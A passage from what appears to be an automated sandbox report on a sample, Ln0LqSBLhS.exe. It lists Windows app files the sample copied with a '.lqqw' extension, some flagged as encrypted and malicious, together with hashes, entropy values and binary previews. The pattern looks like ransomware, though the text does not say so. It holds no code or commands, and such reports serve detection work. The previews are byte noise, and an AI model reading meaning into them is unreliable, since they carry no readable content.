                                                                                                                                                                                                    Preview: J...[.6$..U...a..7.........?..s...y.g.N..o......Q*....:....L..O.V..0..j.q..L.......r.'.02\..?..a.:..6......M..y.q..Lk..ez9..G[}]...-r.P...+....%q/r....0...qS$..!f_r!T..8...f..2.....]......u.........:|........g.D.c..,.i...4...BI.zFZ..Hw a..?..w..3.~.=.....`.ROI......&*$..9...,9.a#.O^0..G!.....{,R..{.7....F~...#..X'....Q^..H......[fIL ..J....Z..;..fa...I.nl...f..6..R......*..1......t..ud.s..9..~g../..|..F...+u#4..E_....(.......47!..:.~..WD..z....C.&.?.@...x.0..;U9f.B9...1..8.>0......j...M.....Y*...2....F...........I.3&.N.d...>.....W.iP/......uXg....h.t..o...1..N....J..M...M#..a..?..DarR....t..2E.........[.......$..X.p[X.].,.T..8w.....H......T ..t{e...N:Xcp..v....|.1...j....V..O..../..6.:...r0[..i..=x...7.j.c.."1..^:.....P....-...t.c.PEQT...S...m...g..O......iq..C..)..].e.)..l5.A..-mn.....J....^%%<.k4.\..5b.. +.Q.be......m-...UR...rd..G.j.nV.zyuCD.._S.m.$...Q1..(dI9.->.......#..sw.'H.`=....dh."E.(..s?W...er.M.N...SA....D80SIxc...`I
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.984386576634609
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:PD+GCQfBmr/0gy8Dm83I9HmHHOun2HTXZPtam1AsFev:b+GCQ5o0Xcpq6HOBXymDK
                                                                                                                                                                                                    MD5:2726F305CD3E4922EB326E8637A153F7
                                                                                                                                                                                                    SHA1:F2AE93B95292680691EE1C5966A166EEEDDEA49A
                                                                                                                                                                                                    SHA-256:68B4037E1838C7857061B3F64929D77EFA22EC7BCFE51E7EE77A9B544685D2F0
                                                                                                                                                                                                    SHA-512:85FEE0F1C57C2FBEE1859EB53B744A46AF5194FBF77674673D6BB112C0D69F62900BAABAB97D0D1E7CCD389AE275DAFBDFCDA820A00D5DE69435DAFBB2010EBC
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .+."}....dp...E....i.KZ.B..M.'..*...h.x.}...k..Mi.x.8..q..:.....r.@.W.+)A..%5.UC......MF...l7.|......m..IJ.a...PE.#.+..'_.:b..{vW_.c \E2...T....V?.DJ.z.(CJ...G........&N..).7..4!......$6M.eC...J.....ua>$...Y...{.{4.!....+.3..9..e.<...y......k.%.G.)^.2..>Z[..<vl..&..Kb&.p.C.T..kS7.;..Mf.Yp....5.M_.'..E.y....*.....^.....|.6...b...6....a8P.`h..v....#..:......jHb.!..i..$`...5.=n. .e...}|..}...(E'../O..$!$7.....,....[ .$i.x..M..LV.2.B_>...g...8.W)....Y!..X...t......L...x..B.....1.D..vr.^.T.AT.X....3f..BJ.A.;..q.Z.e..y#..w..Og...Rh....s....P..E2L.t..Y..../=...1..4-./....e.3.vI.O..Mc...L.k..w.......RA...5...r.....b9...gQoK:.a.[Jlv8..N}..i.W...}fK..e..fU.+.J..p...\.Q.RP5...+i..$...c...6[....t..Q..e....>8.b'v.;.h.$Q.HA.S...l.....z.%.g..eb%=.@OI2f...e..2.......=..gm...(.1.c........X]g.."..)\.......p!.!~D.A..vK=..~......Q/.Ad....f`..-"..7,5.....B........C-.t..O..8s.BOm.T.........b.].%.O........Fz.9...\....DnL5...0..#.. ...).@.E...G[G...M
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG1.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.97624603181706
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:dllxXl/AQVO2P/JjY3X1eQ57YMerOdyeVaTxs7aBYm:dllDRVO6NyXEQ5Tcey0Dm
                                                                                                                                                                                                    MD5:3EC820426309BF0346AEA13E889704F6
                                                                                                                                                                                                    SHA1:1F76DC008A2F97DEF07AF9679DFD29CC4E9417CE
                                                                                                                                                                                                    SHA-256:B8E2779757CFA1E585D77F4FE22E5CF236AA5C70FFB7BB6D662A6EB3D4948F51
                                                                                                                                                                                                    SHA-512:2156503680F85C07EE12919A01E7A71E8E323C3FC6E97CBCA8F5AEBBDC7E1DD7793C483A94E91731CDDACC03549C3036707F4F4990FEEF3AEE24A4C379A7370A
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: U.EB.w.........UM.........l..Hb..x..s.C.0V..R.@..L....Nc.m.....0.!. .....g/.hz9.@...!....W.F..?6r..5k...E...<8.p:..X.A.`J...'6l.-$S.n.9m.H4.....x..]z]Q.....`...HQ.../.20h.......Q0^.....zE...ty....!..).\....*f.kp./.0. cW..R_.u....#......3...;..@..*....[=.....}s.....t.>.....T.H.....m.,.R....t0r..+.....I..3.M.&..a.=..>fe.-.L..^P..Q..l...p.=..p..:....].Qn...R.T......p....[Z...n%d.L......:)wlj.oZ.F. .0.[....Y..Q.-..=DmZ.g..n..,..g..bT.... .wJu.O3..ms.k..,)....L=.h..U.wc....3....9}.....Zbp.+Il.5..j.5.V.v...g.b{h.W....lG..BW.B...;...B3T}....V.t...xm.S7R....CML.V\.....!`.....Q..p#..eN.s.i.............\..x>....hYT...9...g...vc\M....a..."|..v.....Dh.7g=~=[.hVMfT....q....a...z.S.:.q}y....3...85.I$dGW}2.o>..:..-.."..R....B....;.0..}.._/...Cv.ZL$..v..P..a..!..gZ.t|.CQ4.^...u.........tP..<...b.y..)4O._..L....$."...i.v.<ql.'<...)..flc..n..@x6-..S.T..Mi..sj~.T*..N.iE?.]...>G.{.)X.s`E..\.Q...{...C.^..D..I[#.. ..S.p.a.e.V.....YM.....L..s.I.#X..........n=...]EX<..
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.9790403468207005
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:dHWK9T3GIMnNXN/LSx/RGEGGC5Rz54e7RbreCJ:dZTWjT/LK/JGnb75eE
                                                                                                                                                                                                    MD5:30C16B2C90DE558C4588B10BE89310BE
                                                                                                                                                                                                    SHA1:5BDD74C0EE05B0B434F31F862C261469109EF3AA
                                                                                                                                                                                                    SHA-256:8329394E6E0F52DF26A3FF892AA5443EC2B6DE5BB6AA09C7D0FB2170DB587EF4
                                                                                                                                                                                                    SHA-512:58501000F82C49361CBC7B1770910A7CC391B8C5BA230C94BE64645B51D5087A5403A84D26FCBFB8CF1A1073147607B1ADDFCA6C9E04E74A452F806D7A2CB383
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .=IiR...4&..~Jl...=."s........U..GZ..b.u..H....*...36.......ch.3."8.s..6V.i...;.>c.l:..K..a.....4vI.'.Y...\.@...L...E....0B.Nnc...H^= .?........i...'Pb....!........V....u. T.....do..Es,.....-..X\.s...9...-F....G!..>Xs.f._.......:{.5.W.J5...da.l[.L.R.n...&.a..sA.&...#..S....a.x.J.]c.f_.....5....J..> .....r(....[..$..G$.(.1F........2..P!bZ..M..Nk.q....N;.|u...!*|......P.F..C...o.......Z..H.y.)..Z.=Wh....^.X@.....j... .-..a.*{...}8.,.^........io..n...He?....n2...YY....:./)gE..C...{.k.$N..&.{.Q.......X0..G....^.2%V.......,......S.w...y..fX.9.....Z.r.s...W..........m.Y\.%.!%H...|...a.=O../.o.!....<.u..l..._.m4...[l...WGJ"w...}....-.-...........c.r..?.G?.&".,....J....B}z!.3..k......e....:..=.g..%E....j3.-..F.?.`.D......\.3..m..y..r.c.....F.u.%.R..)R.IB.j.d...J.....|aH..{.._......@Zl...K.?....J.....(...}...&..uP...Z.Ff..fc.4pU......m.3U~.<.....Zw.M.$..m......^p.;p)rJ.:.;.a......\X.P8..`../M.D.m+X=..vK....h@..@.8..:..7E$e.F.(......`w..*(.
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-shm.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):33097
                                                                                                                                                                                                    Entropy (8bit):7.9936477651645035
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:768:DHnVO2d8T0unuPq037LWktIcpReYn1YWQaU3+mXjEsw1p0q4G:gwunORkYn1YlpzEqG
                                                                                                                                                                                                    MD5:C8D28006EF25D1F72C536EBF6F047028
                                                                                                                                                                                                    SHA1:FCF0DF82A867A5E18B441C89F2E2B9C1D2455BE3
                                                                                                                                                                                                    SHA-256:99710C5812744F50389980C14F230142F515297CBB4CA2B8BAC76C7943E6EBC4
                                                                                                                                                                                                    SHA-512:55921D20A0DE5D55750E1968F6804AA0CD9E6BDBC8FA4083554628DFFB83248307D2A5030FB1403B0D6F587837C15BB5DDE3C1101D01BEB576C8F519D83ECD87
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..z.:8..YC.y.9.a...lR..G..P....@.x.....O.......4s...{n+.n..3...3A..D..M.....W.....az[..g...61Vr.L...,.....).~..... ....-i.G...5 mV.E....Z..l..XtX.k..3G.}...6.V..D..K..._.q.........[=?.F..!TW.?.....i.t..#$.5^=..[$..!....vv..5...yw.D.y;..6...>.[.F-._.PZ..,"...U..../.....t..W]>..*|.Q.6n...........xW."ks...c...}..x/.'..5.l=`R*..v....3U.M.2z\..Y...L..pZQ..D'..r.89..6...........m...zq".`h..m."..r.dl...=o.[..QN3.!.'....7...w./|.B.{......l..$L.w........p..b..... .WUO.A....t87.g..B..._L...g~.l.....Z]..EX...zb...WX...5m=$..ks....+..nZd.....yD...b.t......'..&...d.....FBy@.0...P..5.j..@XK...x...|.+......l>...Urb.........t......4v../~t.......;o1_{...|ir2...(.......1UVPE.f.Go..B..'.y6[..4......K.2.f..'s.sI.........?.2B=.(0..6._&%&-..L<.7..k.C.}.C|OL....3.W..,..P...-T>HW.h.`.>VK.fsH.g.....4.,.jS..h.w3......W;/..7...EA.k..0.. H.....j=...s...9......5mn\..l.....#....}...........W...'^.e0C.k.].9...."._..Z.......>...qz..o..K.`..m..#..F.st..GL6..
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-wal.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998879120074646
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:EAGTPSg0ALab/ZOEllMHWRa4j3/VicoTHj2cGnQNZf67W3P6y:reP1LazkEI4HP8TCc4n7W3P6y
                                                                                                                                                                                                    MD5:419924293627661F8D6FD9E234C6818B
                                                                                                                                                                                                    SHA1:F229CD21AC3B50D11387CB8C9247AA15D7D2C68B
                                                                                                                                                                                                    SHA-256:6D56D148FF55E2468483DBA3244F14E3B3259174E909E2E256B44CD49D674DD1
                                                                                                                                                                                                    SHA-512:4F5C1F16BB83DFE1DD7A5E5C3122D15C0B998A054C89736C01DB71BF1E6BB06DB14460735570C572FEA9F8D54D7F46A30BF6FD6494C57BD71C8AD83F4B947A11
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: 6...~#W...3..``.....H>.E..#f..Q.].Uy.?.2w..b...1... ..........<.-...._ h_...1B.~..G....L.....n#..f.~U..M_........0... H).UNf=..".GTCK..^............R2.......(e..3NL>S.h.j.x<'.....[W..............Z.Z...&.S.Zy.......A..<.p..r...w.....-.9.L.....R.Q...b....H.}.....vyse..^m.x.+:g..V...5..3....kI.YT.SMI...+.u7.3.......F.c..>.y2.Va.H....2......,)|.S{.^/...._QC2q.......j`m.'....=<.%.f..Jk...w+.%|.f.n..X.......W.>&...!....4..1[.Lly...RtKf3... `hL...KD.....H~...D@0..A.Y9].d./`.HBw...%.......0...Ln)o.H...'.d.[...;>a...3. .N...P..=.7Y.Y.M.....a......)....}..`.r.z..h.}J...S........1.F.yy.7,.....+>...o.|.`.>.8.;).V....8....!.J.tp..n..a.v...'Q.;j'3..t.Bl.~...[.F8.~...AYUo_B..(/..F...tp+....3.....@]p...P..8\. :..F6.<....9A......:....(.1QD..$.#yb0...$S....kLA...g..Q.....x..I.j.......`..dPUa...n`...v.?bC.VEw.........._.A....Kq..70....>h..;...3.....M..|..s.<A....G...;.....fo.m..v..o.._...qw_.2... Fy.....b...C...V..."-.C.....A]<-.O..H.gcw3tPK.g$|...[R..&j.I%.&.z.{.P.
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):4425
                                                                                                                                                                                                    Entropy (8bit):7.953896022285417
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:dRl3uMQGz9kg9MLZxyCCrN6SQgKhDX5OBDijS/m/19:PRuMr0/CMS+hDXQeMG
                                                                                                                                                                                                    MD5:A0ED6355E6D6EC2B19740EB13B1BC30C
                                                                                                                                                                                                    SHA1:DFFF4916D91BE3DE06A3F3892D2577104BFDAC40
                                                                                                                                                                                                    SHA-256:68A81E2C9B0C336A3ABD369AF4809775CD77DA7F84CEB0CB8BABDAF5C23D79DC
                                                                                                                                                                                                    SHA-512:A43326B0FD0EC49B9A7F621FF5065660BBC3FC6BCDC886ABF0E0759BEA4F2860462D6D12D687BC4C8625E6D24858D2F12293A9AD36EEB359FCFEBB4F8992B2C1
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: Io.uC..2..M..0....Y..!.W..C.H..d..M&J'g.Fl.]......wo]hw~..B.z..l.........~(.Y-.....S+.. ^.Pl......{..:&.9..^ .<.)?..N2.Q..S.0.f.o...8.A9..$....UMX...&\.;.g....=.......t..6.`-l.....E._?\..bD...X.j.|9f3sJ-.O.....-. ......C.'.-.....9NE?C.+0Fp->.F*2....b..V.......GQ.`c.......gZ.......Q...=n.......8..Y.......4..tS..M..WT.......T..$..(..#.kHn.|......&S@.AO...9b}.->A.`.0n.....~2A{@SG..:..<...]z..Cg..E......O...I.8u.......:......h.(.$..P![..|47...... ..F....flK(...\...D|Z..X^=.D....F,..r..s.x......6q..(.[..(C....tP.o.W.d.<i..W.&t..:........u....4..:...iO=r...\y!.....L.5&KB{ZfGL)2V,...F...v.].iU..r.R..|}(Xy&.DDY....8P.d.}.32H .#$p5.]..f....rd...<.@eE.26..5.w.......K.o....;.AKQ....YG^...0...o;-J.eXF.k.S...L..G.S...;...q...[4.E..[..".G.WF..6..S\.z.......W...rk.@.)T5N.?....eH.G..O..`....o=E....|...J.U".....e..N..(.p.Z.J.&.e'..?-......>...I..%.C3'.N..8...CR|.....qI.fO..e...J*..8...H...6..u0.d.w~{>M.8..<......@.;.G..y.....^...y.)...!_....D.8Z.]2
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppTracing_startedInBGMode.etl.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):65865
                                                                                                                                                                                                    Entropy (8bit):7.996708445874499
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:1536:mBXMY0zhM+jqD8A7dR2OS9SJo1Y497x38RPrbsXA06C:oMNlMvfySL45x38RDq
                                                                                                                                                                                                    MD5:CF72B0F07648F58108132C7C97C79D44
                                                                                                                                                                                                    SHA1:6C9FC190875C9576C801C1EBD36DD25CF38B2C5A
                                                                                                                                                                                                    SHA-256:69C4CBAF35FDFC86994AF8C5AAAE6FF666D046CC0297CEC2D1BBF9509E3F5A51
                                                                                                                                                                                                    SHA-512:99A00FC1116D26994ADF100665090969048897E531974291063BAB2486D747AF1428A5DB3A34F1FECB9E9F088C8EF596FA7413A6B4084DBDA46B089CFBCA1E0F
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..=I.NP..K.f.PG.Qjj.^...-D.V.....2...m..L....6.OG]..L.....q.r..!.O(.tNq.s.F.=..c.E.......%.FnOEuc-:....jN...3....4.....V..W...J.1..(x.w*.m..j...H..v...@.....(..(..$..2}7..3a.6..1.(;I.. ..t>,.4G....J..Q.l;..........L.UB.|E.L...q....3eWs.t..... |..e...*i=..`TlOq..y.....D...B/.....d>.,^.._.I...9<.~.e..W..F..v.B4#N...T+....Ni[...V.....4...Iv.u......_N.Y..u....qd.}.hb..*..;S37N....../...9s...f4.z'...t(M..E.8.......Ch...:..U...>.KP..6.}m...l.|..+QR.....e.jE^.3r.._P^_T.. [....0XB..[p....ew.\.4.K.C....]+..........hBe.~.'hg#..~..T0.a....59..9.3.1..(\7.........7>T9..w&.1.rX:.Z..[....v.s..p#.t.....j .jvc4h.....I..=K.$.J.^W>.....iaN..sT...q.Y...,g.W.r.Y.-........./2r.g.....1'..........:p.W..X[eE..D%?.....j.7w..t.,..K.....~......sq.X/....M....YU.O...n......G...q...V...^-.].}..n..*.%.orz._3q4^...l;....X.....w..t./..w.......C|..I9x.....|.`..nA.]....8..`...(...................kv.\EK.OF.k..-........d....>.]....<...^R8.j.(Er.uo.`$H.._4.".t..E.3B..&1.J:...~.
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\Settings\settings.dat.LOG1.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.977874113419364
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:slktPvzKV/vbmy2fJatk7pqidJUV8oZ9xTQJbGO/:sStPbKV/Cy2st20Yqz9xTQJ6O
                                                                                                                                                                                                    MD5:EAC48E61EEEBBABC622829C673D4A031
                                                                                                                                                                                                    SHA1:71C8408DE764E4C8138AA01B5268729183C5F9E3
                                                                                                                                                                                                    SHA-256:BC03CA7698CE0806CC2500ED83D7627DD167E652B1C03EFE312D524A7F4BB2AE
                                                                                                                                                                                                    SHA-512:3E38C0B329F75BCF03EE14A8C7A79C2472489554E942EB9DDC4583B2C2BF61BE3D314A8D061E48A1AE96A76C30AEB7AF0ECF6DFB08CC6D5CE16AB701058238FF
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..D]..;..p.]..u.r. 2..h.}....w.l..7. Hn.6.!;...l..|...........e.......Z...FJ.C.hY.+'...p]-...0.!.O.k.....q..v..`.f.r....b...P-..R^ ...0..w-....{........kD.Mc.'.....(.mU.A./..gd..'..o.....*..8...>..w.l.F..Xa...s...6....!](0I.B]...L.6...w......e..'....K...um~..k.(.`xk.....;.Vo.B....V..>..O )..E.L.....|.=..I,A.."Gk.....P...;@B..eh..F...C~.|.B..j....0.cS.x....(..#.........qB.E.C..v...f.....D.M....'..Ha..T....ER..U...`F..Uu!x.7.p.....XO'{.)@.....s......+.#A!~......BL../...4%....6.^.."k.$.j...R.".W*...$]j..B.\K/.@X.G..].5..`\..l.~.K.E..wl_j&r..H.?Oe..hJ..<c.D.1....v....Kk..X.T;;.o..&..z..k.....L.$..Rf...0.f...'gcC......m.T.u.!.[.1DN..{...<.TA.b.h,..O...>..L..<.....N...\c.B......`i....J......@..=.X=..YS..z...A..n....#WY.`5.....&..#.."..<........M.g.z...M..z..avq..!.R...L......tV-l.p..........5.E..V.*U.-EH.7d...c.o.....l=V.....%.O.6.@.f.~.".E....k\..=.a..*.e..M<.....j.....!...9....M......"..F...uM...K.y....w@.pS..,..q...P!._-./....y.x$H..v....CZ.
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.980291767383138
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:DtdniVO9trfwZfCY5mL1oDifptQTMCmMWizVwGIqMLsTvcv:BdniyZwZfCY61PfnQjWkVxIqR2
                                                                                                                                                                                                    MD5:CD79E7BC09DB803F9579F19B7E99F119
                                                                                                                                                                                                    SHA1:C6C6C1D183A1688C8F2BBFD8EC066287106DCB95
                                                                                                                                                                                                    SHA-256:21B3218AF12C1DD203AAB66CB8B8360E1E19A1B9126A7876214E15101D5B38EC
                                                                                                                                                                                                    SHA-512:A869C335563C8ED6582A0A2683EDB9F68593915F2E397262ED150033E433A4EB7E054537A2B9489EC5C614C1F5AD71C1A70F0ECF301FB026C067F367DAFC79B9
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: e.<T.|....!....v..h.z......T.~....R1.b..f..N...}......kVo!.=.R*...)...K..&R.U...{.1$0.Q....*.W...*..X).4dK.Y....~j....]../..*.......{..,2..B._k..`N...Js.=\..'C..XZ.....6y...k..Mv)...0.;......e..'......w.q..g.g.tK.^.HV.S.eDT..,...b....Mi....<.?.[E...'O....-N3z.d."8fH....a..{V.x..1......r..A..t......'.ki.v......rlT..qxN{.L.....q.h.{HE*.(. \.3...T...............z.w.EK......fD.`T..V....0......@...D...z..b.M....8....../f3/.^t..Q.Ks..@..sV..@.....!.0...{F..'<..j.......T.....,T@mG......../....U1Y%9..!w#&...z...E.m............`...n..&.SW.O&.SipY.]...!.~."....RS...A...8."..=m3...u9....&...>....?J.6..:..+.,..9<~Oi.^._.X...^...+..!.....y...i..[-l./3...Z3.3....t.lB..<.\...C.;.u..tK.&)n?....u...ZY.!.{.<*3.y.SO..n...u7{....d.~\6?.w........F!B|.O$C^..p.m..rB..O.#...~.K/=..s.......r7c...v#I.(.k:I..?l./.f...'..,'.G.....b.@.z..0.....c0.G3\....7]...No5\...ti.g.n..;.....6....Q.H....7F..-.#$...%9..P=&...}.e...I..5H...T!\0_G..]..F......H.pp............0....q]P..
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.977011371172465
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:N6vX5TPSLcqZasFQpfdUBLFEk8SWSLmD4:0vJTq4Ykoac
                                                                                                                                                                                                    MD5:6D36006E7ADDAFB6FA81AA3690050120
                                                                                                                                                                                                    SHA1:B1B369BA4B5A566D01DF7A7E52D80BFEAC267AC3
                                                                                                                                                                                                    SHA-256:892C17708B86E4D99A3677BD79B84A17124D55E9A83BB7E7289D314502EE4CDA
                                                                                                                                                                                                    SHA-512:4E1443FCA09A390A0ED757BE9A07AE91B76EE2FF5D4A117EFA59675B7476750E57BE1AABA41105692D3D12AFB52A8BD3F92A4A7F981359787010DF29D34E52A7
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: +..?D....U.z.p....X....&..qxN.......SK..!.(c.......2g.....1..M.!...t._....he......].XM..A].Hr~....Id|![..S.M.-..H.....@>?JiELXY...fJ.j6.+..Nt.y._.A..O+..u?.+A....f..}f....Fv..#i7....P5H.V...}....7...X......QP....d..>7.s.$..J...W..5o..*.lW......u........s*.'....>..g%.M..lI.}......m...n...o........{..d..3c...S>..G.y2.m.....x&...z..".B..#..r...?M...,..x.0k?.n..1......a...K.Y..].].0...g.....1I..2}7.5.`.f....("..L......L..tQ..........m7g.3.p..A..u..]...bg.0..Y. .p..EM`T.mL..t..1.#.-.Q.9...k.I.5.6.xy.^a<1=.j......CP...c..T.!....(..k....bH...Z*.r...t.>c.....e..q......MZ.....%...D.b5.|.).....7...NL?...S.0.Lb.@!.Czd6...z.n/...}......._.. I.X..\.m..GX......7.dU......j...6/......G.....8....J^.Z.WvO.%.s.L.-v....;l2..N?$Q../|Z.J...%~...2*.J3Jp...V./.I}.^..B..3..>.C7...W...w....e/.+mm3...:I...TR....8.....W.......R..........)....9.x.$u.,...Q=.LHb[6zo....F....*9n.8.U.mb.[r.x..UY..a..}.....9.=..y>.#.n.?#..J.....xu.{.._*.l./1...=^..F........<.g......<.
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.974561785646346
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:9hStaZ8vPeFcjj1+6CjlXZI4Bd8kLISIctpZv/IF3iQAtOleg:etaC39Q6CzICpplFQA1g
                                                                                                                                                                                                    MD5:037E70048FD332DCFA88657F3486BC7A
                                                                                                                                                                                                    SHA1:2FEC7454ED5594940DF5448F1A8C6DA3782EE155
                                                                                                                                                                                                    SHA-256:E4844F1AE81DA4B0C4D9A86F0DE7C833CEE0A6696710600BB70092134CCA3745
                                                                                                                                                                                                    SHA-512:3D620732B96A0405AB9DD8D51385081A01F4DF34098D215F1283B73B56937AE4D0154C2BBB25479ABC245EAFBC4685C1DB1EECAB14B22E29B7DE73F9DCDA1F5F
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: 1I.Uy.EC./..\.Q..ms..,...i.`3...oa.......[n.....q5...@..VT.....y..K..%.^...|.U..5..j..8u;...~.,U....i......Fq.j0+..{x...#...w.g!...0O.'.n..!.IW..kt.$..K.f.6^3.i|..c.>.y.............[.......^.(.t..v.Y.-9..H..0.Z.l.1..)S{=...."...s...:J.0...YH.............Jk5...s.k.U.f_>.{.b...N%wu..*+LX..3..n....q.3......c..kL%kU.....Zl\#..fP.!x.H".....{...M0........7Pm.....h(.m..x...D..C.-9.Q$...\v.m.6-b..;rF/.Kp...j0.c...^...\j....F.<..I..y....,E.F...O.@.?.[+.\.....Y!to.C?~.....vz.+..S....cp....=..=S.y.......r..z|g@.;............Ue.W.8..rI5.........\B.Mx....g..!..D.+...v..a...~..{.c.s..v$.|.%.=2..A......1...X&.XK....E[.u.3+*.t.).ykM.+..H".-.\...Z.L..o..~....0e..w. .;c.ho.@..[..6.</...`.8.6eD!.+o...d.;......+xE....c..i......Q.-.Y.`......t<.n.j@.....n3.....xe!.<..9.:G.62..c...A.!..~aP..$.....!8...!-...D..er.C..$..w..K...... ..<....lq..[."F..k.o.J.@........=.....p.='.9m..b:6XX.LfQ..b.W...T.....(.q&j.!.:.6.s5.:e....;H.,&G-..........S..%.j.1..A..)%....
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.980115677500191
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:cxE7wEi0jZIr2PGo+gGvligyOz6ymE5+sOBHNU8aV/nQ3o:kUwEiqayG93DmE5+rfQ/Q3o
